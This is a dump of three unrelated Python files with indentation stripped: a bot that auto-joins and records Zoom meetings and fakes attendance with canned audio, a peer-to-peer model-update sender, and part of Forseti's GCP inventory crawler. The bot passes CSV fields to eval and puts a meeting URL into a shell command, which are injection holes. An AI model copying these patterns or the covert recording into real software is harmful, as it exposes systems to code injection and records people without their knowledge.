logging.error("Could not find 'Join Meeting' on screen!")
return False
time.sleep(2)
# Insert meeting id
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.write(meet_id, interval=0.1)
# Insert name
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.hotkey('ctrl', 'a')
pyautogui.write(DISPLAY_NAME, interval=0.1)
# Configure
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('tab')
pyautogui.press('space')
time.sleep(2)
return check_error()
def join_meeting_url():
logging.info("Join a meeting by URL..")
# Insert name
pyautogui.hotkey('ctrl', 'a')
pyautogui.write(DISPLAY_NAME, interval=0.1)
# Configure
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('space')
pyautogui.press('tab')
pyautogui.press('space')
time.sleep(2)
return check_error()
def check_error():
# Sometimes invalid id error is displayed
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'invalid_meeting_id.png'), confidence=0.9) is not None:
logging.error("Maybe a invalid meeting id was inserted..")
left = False
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'leave.png'), confidence=0.9)
pyautogui.click(x, y)
left = True
except TypeError:
pass
# Valid id
if left:
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_meeting.png'), confidence=0.9) is not None:
logging.error("Invalid meeting id!")
return False
else:
return True
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'authorized_attendees_only.png'), confidence=0.9) is not None:
logging.error("This meeting is for authorized attendees only!")
return False
return True
def find_process_id_by_name(process_name):
list_of_process_objects = []
# Iterate over the all the running process
for proc in psutil.process_iter():
try:
pinfo = proc.as_dict(attrs=['pid', 'name'])
# Check if process name contains the given name string.
if process_name.lower() in pinfo['name'].lower():
list_of_process_objects.append(pinfo)
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
pass
return list_of_process_objects
def show_toolbars():
# Mouse move to show toolbar
width, height = pyautogui.size()
y = (height / 2)
pyautogui.moveTo(0, y, duration=0.5)
pyautogui.moveTo(width - 1, y, duration=0.5)
def join_audio(description):
audio_joined = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_with_computer_audio.png'), confidence=0.9)
logging.info("Join with computer audio..")
pyautogui.click(x, y)
audio_joined = True
return True
except TypeError:
logging.error("Could not join with computer audio!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_join_with_computer_audio_error.png")
time.sleep(1)
if not audio_joined:
try:
show_toolbars()
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_audio.png'), confidence=0.9)
pyautogui.click(x, y)
join_audio(description)
except TypeError:
logging.error("Could not join audio!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_join_audio_error.png")
return False
def unmute(description):
try:
show_toolbars()
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'unmute.png'), confidence=0.9)
pyautogui.click(x, y)
return True
except TypeError:
logging.error("Could not unmute!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(TIME_FORMAT) + "-" + description) + "_unmute_error.png")
return False
def mute(description):
try:
show_toolbars()
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'mute.png'), confidence=0.9)
pyautogui.click(x, y)
return True
except TypeError:
logging.error("Could not mute!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(TIME_FORMAT) + "-" + description) + "_mute_error.png")
return False
def join(meet_id, meet_pw, duration, description):
global VIDEO_PANEL_HIDED
ffmpeg_debug = None
logging.info("Join meeting: " + description)
if DEBUG:
# Start recording
width, height = pyautogui.size()
resolution = str(width) + 'x' + str(height)
disp = os.getenv('DISPLAY')
logging.info("Start recording..")
filename = os.path.join(
REC_PATH, time.strftime(TIME_FORMAT)) + "-" + description + "-JOIN.mkv"
command = "ffmpeg -nostats -loglevel quiet -f pulse -ac 2 -i 1 -f x11grab -r 30 -s " + resolution + " -i " + \
disp + " -acodec pcm_s16le -vcodec libx264rgb -preset ultrafast -crf 0 -threads 0 -async 1 -vsync 1 " + filename
ffmpeg_debug = subprocess.Popen(
command, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
atexit.register(os.killpg, os.getpgid(
ffmpeg_debug.pid), signal.SIGQUIT)
# Exit Zoom if running
exit_process_by_name("zoom")
join_by_url = meet_id.startswith('https://') or meet_id.startswith('http://')
if not join_by_url:
# Start Zoom
zoom = subprocess.Popen("zoom", stdout=subprocess.PIPE,
shell=True, preexec_fn=os.setsid)
img_name = 'join_meeting.png'
else:
logging.info("Starting zoom with url")
zoom = subprocess.Popen(f'zoom --url="{meet_id}"', stdout=subprocess.PIPE,
shell=True, preexec_fn=os.setsid)
img_name = 'join.png'
# Wait while zoom process is there
list_of_process_ids = find_process_id_by_name('zoom')
while len(list_of_process_ids) <= 0:
logging.info("No Running Zoom Process found!")
list_of_process_ids = find_process_id_by_name('zoom')
time.sleep(1)
# Wait for zoom is started
while pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, img_name), confidence=0.9) is None:
logging.info("Zoom not ready yet!")
time.sleep(1)
logging.info("Zoom started!")
start_date = datetime.now()
if not join_by_url:
joined = join_meeting_id(meet_id)
else:
time.sleep(2)
joined = join_meeting_url()
if not joined:
send_telegram_message("Failed to join meeting {}!".format(description))
logging.error("Failed to join meeting!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG and ffmpeg_debug is not None:
# closing ffmpeg
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
if not join_by_url:
pyautogui.write(meet_pw, interval=0.2)
pyautogui.press('tab')
pyautogui.press('space')
# Joined meeting
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
# Check if meeting is started by host
check_periods = 0
meeting_started = True
time.sleep(2)
# Check if waiting for host
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'wait_for_host.png'), confidence=0.9, minSearchTime=3) is not None:
meeting_started = False
logging.info("Please wait for the host to start this meeting.")
# Wait for the host to start this meeting
# Exit when meeting ends after time
while not meeting_started:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'wait_for_host.png'), confidence=0.9) is None:
logging.info("Maybe meeting was started now.")
check_periods += 1
if check_periods >= 2:
meeting_started = True
logging.info("Meeting started by host.")
break
time.sleep(2)
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
# Check if in waiting room
check_periods = 0
in_waitingroom = False
time.sleep(2)
# Check if joined into waiting room
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'waiting_room.png'), confidence=0.9,
minSearchTime=3) is not None:
in_waitingroom = True
logging.info("Please wait, the meeting host will let you in soon..")
# Wait while host will let you in
# Exit when meeting ends after time
while in_waitingroom:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
return
if pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'waiting_room.png'), confidence=0.9) is None:
logging.info("Maybe no longer in the waiting room..")
check_periods += 1
if check_periods == 2:
logging.info("No longer in the waiting room..")
break
time.sleep(2)
# Meeting joined
# Check if connecting
check_connecting(zoom.pid, start_date, duration)
logging.info("Joined meeting..")
# Check if recording warning is shown at the beginning
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'meeting_is_being_recorded.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("This meeting is being recorded..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'got_it.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Accepted recording..")
except TypeError:
logging.error("Could not accept recording!")
# Check if host is sharing poll results at the beginning
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("Host is sharing poll results..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9)
pyautogui.click(x, y)
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'exit.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Closed poll results window..")
except TypeError:
logging.error("Could not exit poll results window!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_close_poll_results_error.png")
except TypeError:
logging.error("Could not find poll results window anymore!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_find_poll_results_error.png")
# Start BackgroundThread
BackgroundThread()
# Set computer audio
time.sleep(2)
if not join_audio(description):
logging.info("Exit!")
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
if DEBUG:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
time.sleep(2)
join(meet_id, meet_pw, duration, description)
# 'Say' something if path available (mounted)
if os.path.exists(AUDIO_PATH):
play_audio(description)
time.sleep(2)
logging.info("Enter fullscreen..")
show_toolbars()
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_error.png")
time.sleep(2)
fullscreen = False
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'fullscreen.png'), confidence=0.9)
pyautogui.click(x, y)
fullscreen = True
except TypeError:
logging.error("Could not find fullscreen!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_fullscreen_error.png")
# TODO: Check for 'Exit Full Screen': already fullscreen -> fullscreen = True
# Screensharing already active
if not fullscreen:
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view options!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_options_error.png")
# Switch to fullscreen
time.sleep(2)
show_toolbars()
logging.info("Enter fullscreen..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'enter_fullscreen.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not enter fullscreen by image!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_enter_fullscreen_error.png")
return
time.sleep(2)
# Screensharing not active
screensharing_active = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
screensharing_active = True
except TypeError:
logging.error("Could not find view options!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_options_error.png")
time.sleep(2)
if screensharing_active:
# hide video panel
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'hide_video_panel.png'), confidence=0.9)
pyautogui.click(x, y)
VIDEO_PANEL_HIDED = True
except TypeError:
logging.error("Could not hide video panel!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_hide_video_panel_error.png")
else:
# switch to speaker view
show_toolbars()
logging.info("Switch view..")
try:
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not find view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_view_error.png")
time.sleep(2)
try:
# speaker view
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'speaker_view.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not switch speaker view!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_speaker_view_error.png")
try:
# minimize panel
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'minimize.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not minimize panel!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_minimize_error.png")
# Move mouse from screen
pyautogui.moveTo(0, 0)
pyautogui.click(0, 0)
if DEBUG and ffmpeg_debug is not None:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
# Audio
# Start recording
logging.info("Start recording..")
filename = os.path.join(REC_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + ".mkv"
width, height = pyautogui.size()
resolution = str(width) + 'x' + str(height)
disp = os.getenv('DISPLAY')
command = "ffmpeg -nostats -loglevel error -f pulse -ac 2 -i 1 -f x11grab -r 30 -s " + resolution + " -i " + \
disp + " -acodec pcm_s16le -vcodec libx264rgb -preset ultrafast -crf 0 -threads 0 -async 1 -vsync 1 " + filename
ffmpeg = subprocess.Popen(
command, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
atexit.register(os.killpg, os.getpgid(
ffmpeg.pid), signal.SIGQUIT)
start_date = datetime.now()
end_date = start_date + timedelta(seconds=duration + 300) # Add 5 minutes
# Start thread to check active screensharing
HideViewOptionsThread()
# Send Telegram Notification
send_telegram_message("Joined Meeting '{}' and started recording.".format(description))
meeting_running = True
while meeting_running:
time_remaining = end_date - datetime.now()
if time_remaining.total_seconds() < 0 or not ONGOING_MEETING:
meeting_running = False
else:
print(f"Meeting ends in {time_remaining}", end="\r", flush=True)
time.sleep(5)
logging.info("Meeting ends at %s" % datetime.now())
# Close everything
if DEBUG and ffmpeg_debug is not None:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
os.killpg(os.getpgid(ffmpeg.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
if not ONGOING_MEETING:
try:
# Press OK after meeting ended by host
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'ok.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_ok_error.png")
send_telegram_message("Meeting '{}' ended.".format(description))
def play_audio(description):
# Get all files in audio directory
files=os.listdir(AUDIO_PATH)
# Filter .wav files
files=list(filter(lambda f: f.endswith(".wav"), files))
# Check if .wav files available
if len(files) > 0:
unmute(description)
# Get random file
file=random.choice(files)
path = os.path.join(AUDIO_PATH, file)
# Use paplay to play .wav file on specific Output
command = "/usr/bin/paplay --device=microphone -p " + path
play = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
res, err = play.communicate()
if play.returncode != 0:
logging.error("Failed playing file! - " + str(play.returncode) + " - " + str(err))
else:
logging.debug("Successfully played audio file! - " + str(play.returncode))
mute(description)
else:
logging.error("No .wav files found!")
def exit_process_by_name(name):
list_of_process_ids = find_process_id_by_name(name)
if len(list_of_process_ids) > 0:
logging.info(name + " process exists | killing..")
for elem in list_of_process_ids:
process_id = elem['pid']
try:
os.kill(process_id, signal.SIGKILL)
except Exception as ex:
logging.error("Could not terminate " + name +
"[" + str(process_id) + "]: " + str(ex))
def join_ongoing_meeting():
with open(CSV_PATH, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=CSV_DELIMITER)
for row in csv_reader:
# Check and join ongoing meeting
curr_date = datetime.now()
# Monday, tuesday, ..
if row["weekday"].lower() == curr_date.strftime('%A').lower():
curr_time = curr_date.time()
start_time_csv = datetime.strptime(row["time"], '%H:%M')
start_date = curr_date.replace(
hour=start_time_csv.hour, minute=start_time_csv.minute)
start_time = start_date.time()
end_date = start_date + \
timedelta(seconds=int(row["duration"]) * 60 + 300) # Add 5 minutes
end_time = end_date.time()
recent_duration = (end_date - curr_date).total_seconds()
if start_time < end_time:
if start_time <= curr_time <= end_time and str(row["record"]) == 'true':
logging.info(
"Join meeting that is currently running..")
join(meet_id=row["id"], meet_pw=row["password"],
duration=recent_duration, description=row["description"])
else: # crosses midnight
if curr_time >= start_time or curr_time <= end_time and str(row["record"]) == 'true':
logging.info(
"Join meeting that is currently running..")
join(meet_id=row["id"], meet_pw=row["password"],
duration=recent_duration, description=row["description"])
def setup_schedule():
with open(CSV_PATH, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=CSV_DELIMITER)
line_count = 0
for row in csv_reader:
if str(row["record"]) == 'true':
cmd_string = "schedule.every()." + row["weekday"] \
+ ".at(\"" \
+ (datetime.strptime(row["time"], '%H:%M') - timedelta(minutes=1)).strftime('%H:%M') \
+ "\").do(join, meet_id=\"" + row["id"] \
+ "\", meet_pw=\"" + row["password"] \
+ "\", duration=" + str(int(row["duration"]) * 60) \
+ ", description=\"" + row["description"] + "\")"
cmd = compile(cmd_string, "<string>", "eval")
eval(cmd)
line_count += 1
logging.info("Added %s meetings to schedule." % line_count)
def main():
try:
if DEBUG and not os.path.exists(DEBUG_PATH):
os.makedirs(DEBUG_PATH)
except Exception:
logging.error("Failed to create screenshot folder!")
raise
setup_schedule()
join_ongoing_meeting()
if __name__ == '__main__':
main()
while True:
schedule.run_pending()
time.sleep(1)
time_of_next_run = schedule.next_run()
time_now = datetime.now()
remaining = time_of_next_run - time_now
print(f"Next meeting in {remaining}", end="\r", flush=True)
|
sender.py
|
from threading import RLock, Event, Condition, Thread
import time
import requests
import json
from src.util import EmptyQueueError, DevicePushbackError
from src.updatequeue import UpdateQueue
class Sender(object):
def __init__(self, k):
# :brief Create a new Sender instance.
self.lock = RLock()
self.my_host = None
self.other_hosts = None
self.other_leaders = None
self.wait_times = {}
self.last_sent_times = {}
self.num_devices = -1
self.last_sent_times = {}
self.wait_times = {}
self.host_locks = {}
# Includes both the queues for other_hosts and other_leaders
self.queues = {}
self.total_no_of_updates = 0
self.min_queue_len = None
self.k = k
self.condition = Condition()
def setup(self, my_host, other_hosts, other_leaders):
# :brief Set up a queue for each host.
# :param my_host [str] an id for this server
# :param other_hosts [array<str>] the id of the other hosts
self.my_host = my_host
self.other_hosts = other_hosts
self.other_leaders = other_leaders
self.num_devices = 1 + len(other_hosts) + len(other_leaders)
self.write()
self.wait_times[my_host] = .1
self.last_sent_times[my_host] = 0
self.host_locks[my_host] = RLock()
for host in other_hosts + other_leaders:
self.queues[host] = UpdateQueue()
self.wait_times[host] = .1
self.last_sent_times[host] = 0
self.host_locks[host] = RLock()
self.release()
def dequeue_every_queue(self):
# :brief Clear every host's queue
# :return nothing
self.write()
for queue in self.queues:
self.total_no_of_updates -= len(self.queues[queue])
self.queues[queue].clear()
self.release()
return
def enqueue(self, update, other_leaders = False):
# :brief Add an update to hosts in same cluster if False.
# Add the update to other_leaders if flag is set as True.
# :param update [Object] a model update that needs to be processed
# :param host [str] the id for the host that generated the update
queues = self.other_leaders if other_leaders else self.other_hosts
for host in queues:
# print("SEND TO", host)
self.write_host(host)
queue = self.queues[host]
if self.min_queue_len != None:
if queue.len > self.k * self.min_queue_len:
self.release_host(host)
raise DevicePushbackError("could not enqueue new update")
queue.enqueue(update)
self.total_no_of_updates += 1
self._update_min_and_max()
self.release_host(host)
# Enqueuing notifies the sender thread
with self.condition:
self.condition.notify()
# print("ML THREAD WOKE UP SENDER THREAD")
def run(self):
# :brief Spawn a new thread and begin sending update requests to other devices
t = Thread(target=self._actually_run)
t.start()
def _actually_run(self):
# :brief Send updates to peers when possible.
while True:
if self.total_no_of_updates > 0:
for host in self.queues:
self._update_host(host)
else:
with self.condition:
# print("SENDER THREAD SLEEPING")
self.condition.wait()
# print("SENDER THREAD WOKE UP FROM ML THREAD")
# TODO (GS): To update min_queue_len after each enqueue and dequeue
def _update_min_and_max(self):
pass
def _update_host(self, host):
# :brief Try to update peer if possible.
# If the update succeeds, then the update will be
# popped from that hosts queue.
if time.time() < self.last_sent_times[host] + self.wait_times[host]:
return
self.read_host(host)
queue = self.queues[host]
update = None
try:
update = queue.dequeue()
self.total_no_of_updates -= 1
except EmptyQueueError:
self.release_host(host)
return
if 'CLEAR' in update:
res = requests.post("http://" + host + "/clear_all_queues", json={"sender": self.my_host, "epoch": update['epoch']})
elif 'CLOSE' in update:
res = requests.post("http://" + host + "/close", json={"sender": self.my_host})
else:
res = requests.post("http://" + host + "/send_update", json={"sender": self.my_host, "update": update})
if res.status_code >= 400 and res.status_code < 500:
self.wait_times[host] *= 2
self.release_host(host)
return
self.last_sent_times[host] = time.time()
self.wait_times[host] = max(0.1, self.wait_times[host] - .1)
self._update_min_and_max()
self.release_host(host)
# Call `read` before reading, and `release` after reading.
# Call `write` before writing, and `release` after writing.
def read_host(self, host):
# :brief Read lock a host queue
# print("READ HOST FOR HOST:", host)
self.host_locks[host].acquire(blocking=0)
def write_host(self, host):
# :brief Write lock a host queue.
self.host_locks[host].acquire(blocking=1)
def release_host(self, host):
# :breif Release a lock on the host queue.
# print("RELEASE HOST FOR HOST", host)
self.host_locks[host].release()
def read(self):
# :brief Read lock on self.
self.lock.acquire(blocking=0)
def write(self):
# :brief Write lock on self.
self.lock.acquire(blocking=1)
def release(self):
# :brief Release lock on self.
self.lock.release()
def __str__(self):
# :brief Print out elements in all queues, for debugging purposes.
# :return [str] the Sender queues as a string
self.read()
re = "\nSender:\n"
for qid in self.queues:
re = re + qid + ":" + str(self.queues[qid].queue) + "\n"
self.release()
return re
|
crawler.py
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Crawler implementation."""
from builtins import str
from builtins import range
from queue import Empty
from queue import Queue
import threading
import time
from future import standard_library
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.services.inventory.base import cai_gcp_client
from google.cloud.forseti.services.inventory.base import cloudasset
from google.cloud.forseti.services.inventory.base import crawler
from google.cloud.forseti.services.inventory.base import gcp
from google.cloud.forseti.services.inventory.base import resources
standard_library.install_aliases()
LOGGER = logger.get_logger(__name__)
class CrawlerConfig(crawler.CrawlerConfig):
"""Crawler configuration to inject dependencies."""
def __init__(self, storage, progresser, api_client, variables=None):
"""Initialize
Args:
storage (Storage): The inventory storage
progresser (QueueProgresser): The progresser implemented using
a queue
api_client (ApiClientImpl): GCP API client
variables (dict): config variables
"""
super(CrawlerConfig, self).__init__()
self.storage = storage
self.progresser = progresser
self.variables = {} if not variables else variables
self.client = api_client
class ParallelCrawlerConfig(crawler.CrawlerConfig):
"""Multithreaded crawler configuration, to inject dependencies."""
def __init__(self, storage, progresser, api_client, threads=10,
variables=None):
"""Initialize
Args:
storage (Storage): The inventory storage
progresser (QueueProgresser): The progresser implemented using
a queue
api_client (ApiClientImpl): GCP API client
threads (int): how many threads to use
variables (dict): config variables
"""
super(ParallelCrawlerConfig, self).__init__()
self.storage = storage
self.progresser = progresser
self.variables = {} if not variables else variables
self.threads = threads
self.client = api_client
class Crawler(crawler.Crawler):
"""Simple single-threaded Crawler implementation."""
def __init__(self, config):
"""Initialize
Args:
config (CrawlerConfig): The crawler configuration
"""
super(Crawler, self).__init__()
self.config = config
def run(self, resource):
"""Run the crawler, given a start resource.
Args:
resource (object): Resource to start with.
Returns:
QueueProgresser: The filled progresser described in inventory
"""
resource.accept(self)
return self.config.progresser
def visit(self, resource):
"""Handle a newly found resource.
Args:
resource (object): Resource to handle.
Raises:
Exception: Reraises any exception.
"""
progresser = self.config.progresser
try:
resource.get_iam_policy(self.get_client())
resource.get_gcs_policy(self.get_client())
resource.get_dataset_policy(self.get_client())
resource.get_cloudsql_policy(self.get_client())
resource.get_billing_info(self.get_client())
resource.get_enabled_apis(self.get_client())
resource.get_kubernetes_service_config(self.get_client())
self.write(resource)
except Exception as e:
LOGGER.exception(e)
progresser.on_error(e)
raise
else:
progresser.on_new_object(resource)
def dispatch(self, callback):
"""Dispatch crawling of a subtree.
Args:
callback (function): Callback to dispatch.
"""
callback()
def write(self, resource):
"""Save resource to storage.
Args:
resource (object): Resource to handle.
"""
self.config.storage.write(resource)
def get_client(self):
"""Get the GCP API client.
Returns:
object: GCP API client
"""
return self.config.client
def on_child_error(self, error):
"""Process the error generated by child of a resource
Inventory does not stop for children errors but raise a warning
Args:
error (str): error message to handle
"""
warning_message = '{}\n'.format(error)
self.config.storage.warning(warning_message)
self.config.progresser.on_warning(error)
def update(self, resource):
"""Update the row of an existing resource
Args:
resource (Resource): Resource to update.
Raises:
Exception: Reraises any exception.
"""
try:
self.config.storage.update(resource)
except Exception as e:
LOGGER.exception(e)
self.config.progresser.on_error(e)
raise
class ParallelCrawler(Crawler):
"""Multi-threaded Crawler implementation."""
def __init__(self, config):
"""Initialize
Args:
config (ParallelCrawlerConfig): The crawler configuration
"""
super(ParallelCrawler, self).__init__(config)
self._write_lock = threading.Lock()
self._dispatch_queue = Queue()
self._shutdown_event = threading.Event()
def _start_workers(self):
"""Start a pool of worker threads for processing the dispatch queue."""
self._shutdown_event.clear()
for _ in range(self.config.threads):
worker = threading.Thread(target=self._process_queue)
worker.daemon = True
worker.start()
def _process_queue(self):
"""Process items in the queue until the shutdown event is set."""
while not self._shutdown_event.is_set():
try:
callback = self._dispatch_queue.get(timeout=1)
except Empty:
continue
callback()
self._dispatch_queue.task_done()
def run(self, resource):
"""Run the crawler, given a start resource.
Args:
resource (Resource): Resource to start with.
Returns:
QueueProgresser: The filled progresser described in inventory
"""
try:
self._start_workers()
resource.accept(self)
self._dispatch_queue.join()
finally:
self._shutdown_event.set()
# Wait for threads to exit.
time.sleep(2)
return self.config.progresser
def dispatch(self, callback):
"""Dispatch crawling of a subtree.
Args:
callback (function): Callback to dispatch.
"""
self._dispatch_queue.put(callback)
def write(self, resource):
"""Save resource to storage.
Args:
resource (Resource): Resource to handle.
"""
with self._write_lock:
self.config.storage.write(resource)
def on_child_error(self, error):
"""Process the error generated by child of a resource
Inventory does not stop for children errors but raise a warning
Args:
error (str): error message to handle
"""
warning_message = '{}\n'.format(error)
with self._write_lock:
self.config.storage.warning(warning_message)
self.config.progresser.on_warning(error)
def update(self, resource):
"""Update the row of an existing resource
Args:
resource (Resource): The db row of Resource to update
Raises:
Exception: Reraises any exception.
"""
try:
with self._write_lock:
self.config.storage.update(resource)
except Exception as e:
LOGGER.exception(e)
self.config.progresser.on_error(e)
raise
def _api_client_factory(storage, config, parallel):
"""Creates the proper initialized API client based on the configuration.
Args:
storage (object): Storage implementation to use.
config (object): Inventory configuration on server.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
Union[gcp.ApiClientImpl, cai_gcp_client.CaiApiClientImpl]:
The initialized api client implementation class.
"""
client_config = config.get_api_quota_configs()
client_config['domain_super_admin_email'] = config.get_gsuite_admin_email()
client_config['excluded_resources'] = config.get_excluded_resources()
asset_count = 0
if config.get_cai_enabled():
# TODO: When CAI supports resource exclusion, update the following
# method to handle resource exclusion during export time.
asset_count = cloudasset.load_cloudasset_data(storage.session, config)
LOGGER.info('%s total assets loaded from Cloud Asset data.',
asset_count)
if asset_count:
engine = config.get_service_config().get_engine()
return cai_gcp_client.CaiApiClientImpl(client_config,
engine,
parallel,
storage.session)
# Default to the non-CAI implementation
return gcp.ApiClientImpl(client_config)
def _crawler_factory(storage, progresser, client, parallel):
"""Creates the proper initialized crawler based on the configuration.
Args:
storage (object): Storage implementation to use.
progresser (object): Progresser to notify status updates.
client (object): The API client instance.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
Union[Crawler, ParallelCrawler]:
The initialized crawler implementation class.
"""
excluded_resources = set(client.config.get('excluded_resources', []))
config_variables = {'excluded_resources': excluded_resources}
if parallel:
parallel_config = ParallelCrawlerConfig(storage,
progresser,
client,
variables=config_variables)
return ParallelCrawler(parallel_config)
# Default to the non-parallel crawler
crawler_config = CrawlerConfig(storage,
progresser,
client,
variables=config_variables)
return Crawler(crawler_config)
def _root_resource_factory(config, client):
"""Creates the proper initialized crawler based on the configuration.
Args:
config (object): Inventory configuration on server.
client (object): The API client instance.
Returns:
Resource: The initialized root resource.
"""
if config.use_composite_root():
composite_root_resources = config.get_composite_root_resources()
return resources.CompositeRootResource.create(composite_root_resources)
# Default is a single resource as root.
